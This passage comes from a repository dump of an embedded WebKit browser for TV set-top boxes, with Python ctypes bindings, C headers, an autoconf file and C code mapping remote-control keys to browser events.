ctypes.dlsym(self.eveBrowser, \"keyPress\")\r\n self._setCallback = ctypes.dlsym(self.eveBrowser, \"setCallback\")\r\n print \"Registering functions - Done\"\r\n except Exception, ex:\r\n print \"Registering functions - Failed (%s)\" % ex\r\n return\r\n \r\n try:\r\n print \"Registering callback\"\r\n\r\n self._EVTFUNC = CFunctionType(__evtInfo)\r\n ctypes.call_function(self._setCallback, (self._EVTFUNC, ))\r\n print \"Registering callback - Done\"\r\n except Exception, ex:\r\n print \"Registering 
callback - Failed (%s)\" % ex\r\n return\r\n \r\n global gIEveBrowser\r\n gIEveBrowser = self\r\n return\r\n \r\n ###\r\n # Framebuffer dimension\r\n def setDimension(self, w, h):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._setDimension, (w, h, ))\r\n \r\n ###\r\n # Load the webpage\r\n # Will not display it if hidden\r\n def loadPage(self, url):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._loadPage, (url, ))\r\n \r\n ###\r\n # Loads the browser\r\n # Will not display it if hidden\r\n def loadEveBrowser(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._loadEveBrowser, ())\r\n \r\n ###\r\n # Unloads the browser and gives the memory back\r\n def unloadEveBrowser(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._unloadEveBrowser, ())\r\n \r\n ###\r\n # Display browser\r\n def show(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._show, ())\r\n \r\n ###\r\n # Hide browser\r\n def hide(self):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._hide, ())\r\n \r\n KEY_TYPE_PRESS = 0\r\n KEY_TYPE_RELEASE = 1\r\n KEY_TYPE_PRELL = 2\r\n \r\n ###\r\n # Routes keypresses to the browser\r\n # type is one of the above KEY_TYPE_*\r\n def keyPress(self, key, type):\r\n if self.eveBrowser is not None:\r\n ctypes.call_function(self._keyPress, (key, type, ))\r\n \r\n \r\n EVT_EVE_BROWSER_LOADED = 0\r\n EVT_PAGE_LOADED = 1\r\n\r\n EVT_PIG_CHANGED = 2\r\n \r\n EVT_C_O_BIND_TO_CURRENT_CHANNEL = 100\r\n \r\n ###\r\n # Called when the webpage has been loaded\r\n # There are different possible approaches: either e2 displays the red button, or the browser does\r\n def _evtInfo(self, type):\r\n print \"_evtInfo:\", type\r\n if type == self.EVT_EVE_BROWSER_LOADED:\r\n pass\r\n elif type == self.EVT_PAGE_LOADED:\r\n pass\r\n elif type == self.EVT_PIG_CHANGED:\r\n pass\r\n else:\r\n pass\r\n \r\n if self.evtInfo is not None:\r\n self.evtInfo(type)\r\n \r\n def setEvtInfoCallback(self, fnc):\r\n self.evtInfo = fnc\r\n" }, { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 27.41666603088379, "blob_id": "ecf2564e79844960b88e6bf626d5f8988128f491", "content_id": "2127bf2aeb7435709be1c450bd5311060df6ea17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 341, "license_type": "no_license", "max_line_length": 98, "num_lines": 12, "path": "/js_debug.h", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#ifndef JS_DEBUG_H_\n#define JS_DEBUG_H_\n\nvoid printJSStringRef(JSStringRef string);\n\nvoid printJSObjectRef(JSContextRef ctx, JSObjectRef argument);\n\nvoid printJSValueRef(JSContextRef ctx, JSValueRef argument, JSValueRef *exception);\n\nint JSValueToString(JSContextRef ctx, JSValueRef argument, JSValueRef *exception, char ** string);\n\n#endif\n" }, { "alpha_fraction": 0.7608142495155334, "alphanum_fraction": 0.7608142495155334, "avg_line_length": 18.649999618530273, "blob_id": "dbed298faa67d17c307571ee769194c64a76691a", "content_id": "bfa826498c982c0d1d5f3a48523ceb9c951c7d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 393, "license_type": "no_license", "max_line_length": 72, "num_lines": 20, "path": "/js_extension.h", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#ifndef JS_EXTENSIONS_H_\n#define JS_EXTENSIONS_H_\n\n#ifdef DFB\n#include <webkit/webkitdfb.h>\n#include 
<webkit/webview.h>\n#endif\n\n#ifdef GTK\nvoid registerSpecialJsFunctions(WebKitWebView* web_view);\n#endif\n\n#ifdef GTK\nvoid registerJsFunctions(WebKitWebView* web_view, int (*fnc)(int type));\n#endif\n#ifdef DFB\nvoid registerJsFunctions(LiteWebView* web_view, int (*fnc)(int type));\n#endif\n\n#endif\n" }, { "alpha_fraction": 0.7270668148994446, "alphanum_fraction": 0.7508493661880493, "avg_line_length": 18.622222900390625, "blob_id": "8ed52d95b9c5b0507010295259fb1ecfa95400a0", "content_id": "1b555cfdadc57a887ab60e266e26774f583dbbc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "M4Sugar", "length_bytes": 883, "license_type": "no_license", "max_line_length": 68, "num_lines": 45, "path": "/configure.ac", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "AC_INIT(libevebrowser,0.0.1)\nAM_INIT_AUTOMAKE(libevebrowser,0.0.1)\n\ndnl AM_MAINTAINER_MODE provides the option to enable maintainer mode\nAM_MAINTAINER_MODE\n\nAM_INIT_AUTOMAKE($PACKAGE, $VERSION)\n\ndnl make aclocal work in maintainer mode\nAC_SUBST(ACLOCAL_AMFLAGS, \"-I m4\")\n\nAM_CONFIG_HEADER(config.h)\n\ndnl check for tools\nAC_PROG_CC\nAC_PROG_CXX\nAC_PROG_INSTALL\nAC_PROG_LIBTOOL\n\nAM_PATH_PYTHON\nAX_PYTHON_DEVEL\n\n\nPKG_CHECK_MODULES(PNG, libpng >= 0.0.1)\nAC_SUBST(PNG_CFLAGS)\nAC_SUBST(PNG_LIBS)\n\nPKG_CHECK_MODULES(FUSION, fusion >= 0.0.1)\nAC_SUBST(FUSION_CFLAGS)\nAC_SUBST(FUSION_LIBS)\n\nPKG_CHECK_MODULES(WEBKIT, webkit-1.0 >= 0.0.1)\nAC_SUBST(WEBKIT_CFLAGS)\nAC_SUBST(WEBKIT_LIBS)\n\nPKG_CHECK_MODULES(DFBINT, directfb-internal >= 0.0.1)\nAC_SUBST(DFBINT_CFLAGS)\nAC_SUBST(DFBINT_LIBS)\n\n# Checks for header files.\nAC_CHECK_HEADERS([stdlib.h string.h sys/time.h unistd.h])\n\nAC_OUTPUT(\nMakefile\n)\n" }, { "alpha_fraction": 0.7786259651184082, "alphanum_fraction": 0.7786259651184082, "avg_line_length": 15.375, "blob_id": "106a3af2a02293c98383b10cfe1248149ff5bde5", "content_id": "de708d4be7c72de538bfa723b2dd620d7bd6b10f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 131, "license_type": "no_license", "max_line_length": 51, "num_lines": 8, "path": "/css_extension.h", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#ifndef CSS_EXTENSIONS_H_\n#define CSS_EXTENSIONS_H_\n\n#ifdef GTK\nvoid registerCssExtension(WebKitWebView* web_view);\n#endif\n\n#endif\n" }, { "alpha_fraction": 0.5715886354446411, "alphanum_fraction": 0.5828268527984619, "avg_line_length": 27.129894256591797, "blob_id": "2e6b4586f47ed285004a5356d1984f230eca6abc", "content_id": "612772fb3d1e0b624ff70dc9e24937be0340ebc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 29453, "license_type": "no_license", "max_line_length": 119, "num_lines": 1047, "path": "/main.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <sys/time.h>\n#include <string.h>\n#include <pthread.h>\n#include <linux/input.h>\n#include <unistd.h>\n\n#ifdef GTK\n#include <gdk/gdkkeysyms.h>\n#include <gtk/gtk.h>\n#include <webkit/webkit.h>\n#endif\n\n#ifdef DFB\n#include <direct/thread.h>\n\n#include <glib.h>\n#include <glib-object.h>\n\n#include <lite/lite.h>\n#include <lite/window.h>\n\n#include <leck/textbutton.h>\n#include <leck/textline.h>\n\n#include <webkit/webkitdfb.h>\n#include <webkit/webview.h>\n\n#include <core/input.h>\n#endif\n\n#include <JavaScriptCore/JavaScript.h>\n\n#include 
\"js_extension.h\"\n#include \"css_extension.h\"\n\nstatic int (*g_Callback)(int type);\nstatic pthread_t g_BrowserMain;\nstatic char g_url[1024] = \"http://itv.ard.de/ardtext/\";\nstatic unsigned int g_framebuffer_width = 1280;\nstatic unsigned int g_framebuffer_height = 720;\nstatic int g_run = 1;\n\n#ifdef DFB\nstatic LiteWindow *g_window = NULL;\nstatic LiteWebView *g_webview = NULL;\n\nstatic pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;\n\nstatic IDirectFBWindow *g_dfb_window = NULL;\n#endif\n\n////////////////////////////////////////////\n\n//Should be changed to setPage and loadPage\nvoid loadPage(char * url)\n{\n printf(\"%s URL = %s\\n\", __func__, url);\n strncpy(g_url, url, 1024);\n/*#ifdef GTK\n webkit_web_view_load_uri (g_web_view, g_url);\n#else //DFB\n lite_webview_load(g_webview, g_url);\n#endif*/\n}\n\nvoid setDimension(int w, int h)\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n g_framebuffer_width = w;\n g_framebuffer_height = h;\n}\n\nvoid setCallback(int (*fnc)(int type))\n{\n g_Callback = fnc;\n g_Callback(0);\n}\n\n#ifdef DFB\nstatic DFBResult\non_key_press( DFBWindowEvent* evt, void *ctx ) {\nprintf(\".\");\n if (evt->key_code == 0 && evt->key_id != 0xf600)\n { \n printf(\"on_key_press\\n\");\n /*printf(\"\\tevt->clazz: %02x\\n\", evt->clazz);\n printf(\"\\tevt->type: %02x\\n\", evt->type);\n printf(\"\\tevt->flags: %02x\\n\", evt->flags);\n printf(\"\\tevt->window_id: %02x\\n\", evt->window_id);\n printf(\"\\tevt->key_code: %02x\\n\", evt->key_code);\n printf(\"\\tevt->key_id: %02x\\n\", evt->key_id);\n printf(\"\\tevt->key_symbol: %02x\\n\", evt->key_symbol);\n printf(\"\\tevt->modifiers: %02x\\n\", evt->modifiers);\n printf(\"\\tevt->locks: %02x\\n\", evt->locks);*/\n \n return DFB_OK;\n }\n\n evt->key_id = (DFBInputDeviceKeyIdentifier)0x0;\n\n return DFB_FAILURE;\n}\n\n#define KEY_TYPE_PRESS 0\n#define KEY_TYPE_RELEASE 1\n\n/*\non_key_press\n evt->clazz: 02\n evt->type: 100\n evt->flags: 00\n evt->window_id: 01\n evt->key_code: 6c\n evt->key_symbol: f003\n evt->modifiers: 00\n evt->locks: 00\non_key_press\n evt->clazz: 02\n evt->type: 200\n evt->flags: 00\n evt->window_id: 01\n evt->key_code: 6c\n evt->key_symbol: f003\n evt->modifiers: 00\n evt->locks: 00\nkeyPress down press\non_key_press\n evt->clazz: 00\n evt->type: 100\n evt->flags: 00\n evt->window_id: 00\n evt->key_code: 00\n evt->key_symbol: 00\n evt->modifiers: 01\n evt->locks: 00\nkeyPress down release\non_key_press\n evt->clazz: 00\n evt->type: 200\n evt->flags: 00\n evt->window_id: 00\n evt->key_code: 00\n evt->key_symbol: 00\n evt->modifiers: 01\n evt->locks: 00\n*/\n\nvoid keyPress(char * key, int type)\n{\n printf(\"%s %s %s\\n\", __func__, key, type==0?\"press\":\"release\");\n\n#if 1 //WindowEvent\n DFBWindowEvent* event = ( DFBWindowEvent*)malloc(sizeof(DFBWindowEvent));\n memset(event, 0, sizeof(DFBWindowEvent));\n\n event->clazz = DFEC_WINDOW;\n\n if(type == KEY_TYPE_PRESS)\n event->type = DWET_KEYDOWN;\n else if(type == KEY_TYPE_RELEASE)\n event->type = DWET_KEYUP;\n else\n return;\n\n event->flags = DWEF_NONE;\n event->window_id = 1;\n#else //InputEvent\n DFBInputEvent* event = ( DFBInputEvent*)malloc(sizeof(DFBInputEvent));\n memset(event, 0, sizeof(DFBInputEvent));\n \n if(type == KEY_TYPE_PRESS)\n event->type = DIET_KEYPRESS;\n else if(type == KEY_TYPE_RELEASE)\n event->type = DIET_KEYRELEASE;\n else\n return;\n#endif\n\n //gettimeofday(&(event->timestamp), NULL);\n \n if (!strcmp(key, \"red\")) {\n event->key_id = DIKI_F5; //'t';\n event->key_symbol = DIKS_F5;\n } else 
if(!strcmp(key, \"green\")) {\n event->key_id = DIKI_F6; //'u';\n event->key_symbol = DIKS_F6;\n } else if(!strcmp(key, \"yellow\")) {\n event->key_id = DIKI_F7; //'v';\n event->key_symbol = DIKS_F7;\n } else if(!strcmp(key, \"blue\")) {\n event->key_id = DIKI_F8; //'w';\n event->key_symbol = DIKS_F8;\n\n } else if(!strcmp(key, \"up\")) {\n event->key_id = DIKI_UP; //f643\n event->key_symbol = DIKS_CURSOR_UP;\n } else if(!strcmp(key, \"down\")) {\n event->key_id = DIKI_DOWN;\n event->key_symbol = DIKS_CURSOR_DOWN; //(DFBInputDeviceKeySymbol)0xf003;\n } else if(!strcmp(key, \"left\")) {\n event->key_id = DIKI_LEFT;\n event->key_symbol = DIKS_CURSOR_LEFT;\n } else if(!strcmp(key, \"right\")) {\n event->key_id = DIKI_RIGHT;\n event->key_symbol = DIKS_CURSOR_RIGHT;\n \n } else if(!strcmp(key, \"ok\")) {\n event->key_id = DIKI_ENTER;\n event->key_symbol = DIKS_ENTER;\n \n } else if(!strcmp(key, \"1\")) {\n event->key_id = DIKI_1;\n event->key_symbol = DIKS_2;\n } else if(!strcmp(key, \"2\")) {\n event->key_id = DIKI_2;\n event->key_symbol = DIKS_2;\n } else if(!strcmp(key, \"3\")) {\n event->key_id = DIKI_3;\n event->key_symbol = DIKS_3;\n } else if(!strcmp(key, \"4\")) {\n event->key_id = DIKI_4;\n event->key_symbol = DIKS_4;\n } else if(!strcmp(key, \"5\")) {\n event->key_id = DIKI_5;\n event->key_symbol = DIKS_5;\n } else if(!strcmp(key, \"6\")) {\n event->key_id = DIKI_6;\n event->key_symbol = DIKS_6;\n } else if(!strcmp(key, \"7\")) {\n event->key_id = DIKI_7;\n event->key_symbol = DIKS_7;\n } else if(!strcmp(key, \"8\")) {\n event->key_id = DIKI_8;\n event->key_symbol = DIKS_8;\n } else if(!strcmp(key, \"9\")) {\n event->key_id = DIKI_9;\n event->key_symbol = DIKS_9;\n } else if(!strcmp(key, \"0\")) {\n event->key_id = DIKI_0;\n event->key_symbol = DIKS_0;\n\n //TODO: Confirm these\n } else if(!strcmp(key, \"play\")) {\n event->key_id = DIKI_P;\n event->key_symbol = DIKS_CAPITAL_P;\n } else if(!strcmp(key, \"pause\")) {\n event->key_id = DIKI_P; // PAUSE IS Q but it seems that P is Toggle PlayPause\n event->key_symbol = DIKS_CAPITAL_P;\n } else if(!strcmp(key, \"stop\")) {\n event->key_id = DIKI_S;\n event->key_symbol = DIKS_CAPITAL_S;\n } else if(!strcmp(key, \"rewind\")) {\n event->key_id = DIKI_R;\n event->key_symbol = DIKS_CAPITAL_R;\n } else if(!strcmp(key, \"fastforward\")) {\n event->key_id = DIKI_F;\n event->key_symbol = DIKS_CAPITAL_F;\n } else {\n event->key_id = (DFBInputDeviceKeyIdentifier)0;\n }\n \n if(event->key_id != 0) {\n printf(\"Injecting: event.key_id=%02x\\n\", event->key_id);\n //pthread_mutex_lock(&mutex);\n#if 0 // LITE_INJECTION_WORKS\n lite_webview_handleKeyboardEvent( g_webview, event );\n#else\n if(g_dfb_window != NULL)\n g_dfb_window->SendEvent(g_dfb_window, event);\n#endif\n //pthread_mutex_unlock(&mutex);\n return;\n }\n\n free(event);\n\n return;\n}\n\nvoid on_webview_doc_loaded( LiteWebView *webview, void *data )\n{\n lite_webview_set_transparent(webview, true);\n}\n\nstatic int timer_id;\n\nstatic DFBResult timeout_cb(void* data)\n{\n g_main_context_iteration(NULL, FALSE);\n lite_enqueue_window_timeout(200, timeout_cb, NULL, &timer_id);\n return DFB_OK;\n}\n\nvoid *BrowserMain(void * argument)\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n\n int argc = 0;\n char**argv = NULL;\n\n\n pthread_mutex_init (&mutex, NULL);\n \n g_type_init();\n g_thread_init(NULL);\n\n lite_open( &argc, &argv );\n\n WebKitDFB_Initialize( lite_get_dfb_interface() );\n\n IDirectFBDisplayLayer *layer;\n DFBDisplayLayerConfig config;\n lite_get_layer_interface( &layer );\n 
layer->GetConfiguration( layer, &config );\n\n DFBRectangle windowRect = { 0, 0, config.width, config.height };\n DFBRectangle webviewRect = { 0, 0, config.width, config.height };\n\n lite_new_window( NULL, &windowRect, DWCAPS_NONE, liteNoWindowTheme, \"WebKitDFB\", &g_window );\n \n lite_new_webview( LITE_BOX(g_window), &webviewRect, liteDefaultWebViewTheme, &g_webview);\n\n lite_on_webview_doc_loaded ( g_webview, on_webview_doc_loaded, NULL );\n\n lite_on_raw_window_keyboard(g_window, on_key_press, g_webview );\n\n lite_focus_box( LITE_BOX(g_webview) );\n\n lite_set_window_opacity(g_window, 0xff);\n\n g_window->bg.enabled = DFB_FALSE;\n //lite_set_window_background_color(g_window, 0xff, 0, 0, 0xff);\n\n registerJsFunctions(g_webview, g_Callback);\n\n lite_webview_load(g_webview, g_url);\n lite_webview_set_transparent(g_webview, true);\n\n // FAKE KEY INTERFACE\n //IDirectFB *dfb;\n //dfb = lite_get_dfb_interface();\n //IDirectFBDisplayLayer *layer = NULL;\n //dfb->GetDisplayLayer(dfb, DLID_PRIMARY, &layer);\n layer->GetWindow(layer, 1, &g_dfb_window);\n\n lite_enqueue_window_timeout(200, timeout_cb, NULL, &timer_id);\n g_run = 1;\n while (g_run) {\n pthread_mutex_lock(&mutex);\n\n g_main_context_iteration(NULL, FALSE);\n lite_window_event_loop(g_window, 1);\n pthread_mutex_unlock(&mutex);\n }\n\n lite_close();\n\n return NULL;\n}\n\n#include <unistd.h>\nint\nmain (int argc, char* argv[])\n{\n pthread_create(&g_BrowserMain, NULL, BrowserMain, NULL);\n //pthread_join(g_BrowserMain, NULL);\n while(1) {\n sleep(2);\n keyPress(\"blue\", 0);\n keyPress(\"blue\", 1);\n }\n\n return 0;\n}\n\nvoid loadEveBrowser()\n{\n}\n\nvoid unloadEveBrowser()\n{\n g_run = 0;\n}\n\nvoid show()\n{\n pthread_create(&g_BrowserMain, NULL, BrowserMain, NULL);\n}\n\nvoid hide()\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n //gtk_widget_hide_all (g_window);\n}\n\n#endif\n\n#ifdef GTK\nstatic GtkWidget* uri_entry;\n\n\nstatic GtkToolItem* itemUrl;\nstatic GtkScrolledWindow* scrolled_window;\nstatic guint status_context_id;\n\n\n\n\n\n\nstatic GtkWidget* g_window;\nstatic GtkWidget* g_vbox;\nstatic WebKitWebView* g_web_view;\nstatic GtkWidget* g_toolbar;\nstatic GtkStatusbar* g_main_statusbar;\n\n\nfloat g_default_scale = 1.0f;\n///////////////////////////\n///////////////////////////\n\nstatic void window_object_cleared_cb( WebKitWebView *frame,\n gpointer context,\n gpointer arg3,\n gpointer user_data)\n{\n printf(\"window_object_cleared_cb\\n\");\n\n registerJsFunctions(g_web_view, g_Callback);\n}\n\n///////////////////////7\n\nstatic void\nactivate_uri_entry_cb (GtkWidget* entry, gpointer data)\n{\n const gchar* uri = gtk_entry_get_text (GTK_ENTRY (entry));\n g_assert (uri);\n webkit_web_view_load_uri (g_web_view, uri);\n}\n\nstatic void\nlink_hover_cb (WebKitWebView* page, const gchar* title, const gchar* link, gpointer data)\n{\n /* underflow is allowed */\n gtk_statusbar_pop (g_main_statusbar, status_context_id);\n if (link)\n gtk_statusbar_push (g_main_statusbar, status_context_id, link);\n}\n\nstatic void\nnotify_load_status_cb (WebKitWebView* web_view, GParamSpec* pspec, gpointer data)\n{\n if (webkit_web_view_get_load_status (web_view) == WEBKIT_LOAD_COMMITTED) {\n WebKitWebFrame* frame = webkit_web_view_get_main_frame (web_view);\n const gchar* uri = webkit_web_frame_get_uri (frame);\n if (uri)\n gtk_entry_set_text (GTK_ENTRY (uri_entry), uri);\n }\n}\n\nstatic void\ndestroy_cb (GtkWidget* widget, gpointer data)\n{\n gtk_main_quit ();\n}\n\n\nstatic gboolean\nfocus_out_cb (GtkWidget* widget, GdkEvent * 
event, gpointer data)\n{\n printf(\"%s > \\n\", __func__);\n gtk_widget_grab_focus(widget);\n return false;\n}\n\n\nstatic void\ndocument_load_finished_cb (GtkWidget* widget, WebKitWebFrame * arg1, gpointer data)\n{\n registerCssExtension(g_web_view);\n\n // Only use if debugging is needed\n //registerSpecialJsFunctions(g_web_view);\n}\n\n\nvoid goBack()\n{\n webkit_web_view_go_back(g_web_view);\n}\n\nvoid gtk_widget_set_can_focus(GtkWidget* wid, gboolean can)\n{\n if(can)\n GTK_WIDGET_SET_FLAGS(wid, GTK_CAN_FOCUS);\n else\n GTK_WIDGET_UNSET_FLAGS(wid, GTK_CAN_FOCUS);\n}\n\nstatic GtkScrolledWindow*\ncreate_browser ()\n{\n scrolled_window = (GtkScrolledWindow*)gtk_scrolled_window_new (NULL, NULL);\n gtk_scrolled_window_set_policy (GTK_SCROLLED_WINDOW (scrolled_window), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC);\n\n g_web_view = WEBKIT_WEB_VIEW (webkit_web_view_new ());\n webkit_web_view_set_transparent(g_web_view, true);\n gtk_container_add (GTK_CONTAINER (scrolled_window), GTK_WIDGET (g_web_view));\n webkit_web_view_set_full_content_zoom(g_web_view, true);\n\n g_signal_connect (g_web_view, \"notify::load-status\", G_CALLBACK (notify_load_status_cb), g_web_view);\n g_signal_connect (g_web_view, \"hovering-over-link\", G_CALLBACK (link_hover_cb), g_web_view);\n\n g_signal_connect (g_web_view, \"focus-out-event\", G_CALLBACK (focus_out_cb), g_web_view);\n\n g_signal_connect (g_web_view, \"document-load-finished\", G_CALLBACK (document_load_finished_cb), g_web_view);\n\n g_signal_connect (g_web_view, \"window_object_cleared\", G_CALLBACK (window_object_cleared_cb), g_web_view);\n\n return scrolled_window;\n}\n\nstatic GtkWidget*\ncreate_statusbar ()\n{\n g_main_statusbar = GTK_STATUSBAR (gtk_statusbar_new ());\n gtk_widget_set_can_focus(GTK_WIDGET (g_main_statusbar), false);\n status_context_id = gtk_statusbar_get_context_id (g_main_statusbar, \"Link Hover\");\n \n return (GtkWidget*)g_main_statusbar;\n}\n\nstatic GtkWidget*\ncreate_toolbar ()\n{\n g_toolbar = gtk_toolbar_new ();\n gtk_widget_set_can_focus(GTK_WIDGET (g_toolbar), false);\n\n#if GTK_CHECK_VERSION(2,15,0)\n gtk_orientable_set_orientation (GTK_ORIENTABLE (g_toolbar), GTK_ORIENTATION_HORIZONTAL);\n#else\n gtk_toolbar_set_orientation (GTK_TOOLBAR (g_toolbar), GTK_ORIENTATION_HORIZONTAL);\n#endif\n gtk_toolbar_set_style (GTK_TOOLBAR (g_toolbar), GTK_TOOLBAR_BOTH_HORIZ);\n\n\n /* The URL entry */\n itemUrl = gtk_tool_item_new ();\n gtk_widget_set_can_focus(GTK_WIDGET (itemUrl), false);\n gtk_tool_item_set_expand (itemUrl, TRUE);\n uri_entry = gtk_entry_new ();\n gtk_container_add (GTK_CONTAINER (itemUrl), uri_entry);\n g_signal_connect (G_OBJECT (uri_entry), \"activate\", G_CALLBACK (activate_uri_entry_cb), NULL);\n gtk_toolbar_insert (GTK_TOOLBAR (g_toolbar), itemUrl, -1);\n\n return g_toolbar;\n}\n\n/**\n * This toggles the background of the window\n **/\nstatic void\ntoogleBackground (void)\n{\n printf(\"%s > \\n\", __func__);\n static gboolean isTransparent = false;\n isTransparent = !isTransparent;\n webkit_web_view_set_transparent(g_web_view, isTransparent);\n}\n\nstatic gboolean isShown = true;\n\nstatic void\ntoogleMode (void)\n{\n printf(\"%s > \\n\", __func__);\n if(isShown)\n {\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width, g_framebuffer_height);\n gtk_widget_hide(GTK_WIDGET (g_main_statusbar));\n gtk_widget_hide(GTK_WIDGET (g_toolbar));\n }\n 
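// chrome was hidden: shrink the page area by 200px, show toolbar and status bar again and move focus to the URL entry\n 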
else\n {\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width-200, g_framebuffer_height);\n gtk_widget_show(GTK_WIDGET (g_main_statusbar));\n gtk_widget_show(GTK_WIDGET (g_toolbar));\n\n gtk_widget_grab_focus(GTK_WIDGET (itemUrl));\n }\n isShown = !isShown;\n}\n\nstatic gboolean gIsNumLock = false;\nstatic void toogleNumLock()\n{\n gIsNumLock = !gIsNumLock;\n}\n\nstatic gboolean gIsZoomLock = false;\nstatic void toggleZoomLock()\n{\n gIsZoomLock = !gIsZoomLock;\n}\n\nstatic void handleZoomLock(int value)\n{\n if(value > 0)\n webkit_web_view_zoom_in(g_web_view);\n else if(value < 0)\n webkit_web_view_zoom_out(g_web_view);\n else\n webkit_web_view_set_zoom_level(g_web_view, g_default_scale );\n}\n\nstatic gboolean\non_key_press (GtkWidget* widget, GdkEventKey *event, gpointer data)\n{\n\nif(event->send_event == 0)\n return true;\n\nprintf(\"POST----------\\n\");\nprintf(\"type = %d\\n\", event->type);\nprintf(\"window = %8x\\n\", event->window);\nprintf(\"send_event = %d\\n\", event->send_event );\nprintf(\"time = %8x\\n\", event->time);\nprintf(\"state = %d\\n\", event->state);\nprintf(\"keyval = %d\\n\", event->keyval);\n//printf(\"length = %d\\n\", event->length);\n//printf(\"string = %s\\n\", event->string);\nprintf(\"hardware_keycode = %d\\n\", event->hardware_keycode);\nprintf(\"group = %d\\n\", event->group);\nprintf(\"is_modifier = %d\\n\", event->is_modifier);\n\n if (event->type == GDK_KEY_PRESS)\n {\n\n if(gIsZoomLock)\n {\n switch(event->keyval)\n {\n case GDK_Up: handleZoomLock(+1); break;\n case GDK_Return: handleZoomLock(0); break;\n case GDK_Down: handleZoomLock(-1); break;\n default: break;\n }\n }\n\n if (event->keyval == GDK_F1)\n {\n toogleMode();\n }\n else if (isShown && event->keyval == GDK_F2)\n {\n //toogleBackground();\n toggleZoomLock();\n }\n else if (isShown && event->keyval == GDK_Num_Lock)\n {\n toogleNumLock();\n }\n else if (isShown && event->keyval == GDK_F4)\n {\n gboolean rtv;\n event->keyval = GDK_Tab;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_F3)\n {\n gboolean rtv;\n event->keyval = GDK_Tab;\n event->state |= GDK_SHIFT_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval >= 0xFFB0 && event->keyval <= 0xFFB9)\n {\n gIsNumLock = true;\n //event->state |= GDK_MOD1_MASK;\n switch(event->keyval) {\n case GDK_KP_1: event->keyval = '.'; break;\n case GDK_KP_2: event->keyval = 'a'; break;\n case GDK_KP_3: event->keyval = 'd'; break;\n case GDK_KP_4: event->keyval = 'g'; break;\n case GDK_KP_5: event->keyval = 'j'; break;\n case GDK_KP_6: event->keyval = 'm'; break;\n case GDK_KP_7: event->keyval = 'p'; break;\n case GDK_KP_8: event->keyval = 't'; break;\n case GDK_KP_9: event->keyval = 'w'; break;\n case GDK_KP_0: event->keyval = '+'; break;\n default: break;\n }\n }\n else if (isShown && event->keyval == GDK_KP_Down )\n {\n gboolean rtv;\n event->keyval = '2';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Up )\n {\n gboolean rtv;\n event->keyval = '8';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Left )\n {\n gboolean rtv;\n event->keyval = '4';\n event->state |= GDK_MOD1_MASK;\n 
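// keypad navigation is re-dispatched as Alt+digit (Alt+'4' for keypad-left here), presumably so page-side key handlers can tell keypad input apart from the plain cursor keys\n 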
gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Right )\n {\n gboolean rtv;\n event->keyval = '6';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Home )\n {\n gboolean rtv;\n event->keyval = '7';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Page_Up )\n {\n gboolean rtv;\n event->keyval = '9';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_End )\n {\n gboolean rtv;\n event->keyval = '1';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Page_Down )\n {\n gboolean rtv;\n event->keyval = '3';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && (event->keyval == GDK_KP_Insert || event->keyval == 0xFFFFFF))\n {\n gboolean rtv;\n event->keyval = '0';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Begin )\n {\n gboolean rtv;\n event->keyval = '5';\n 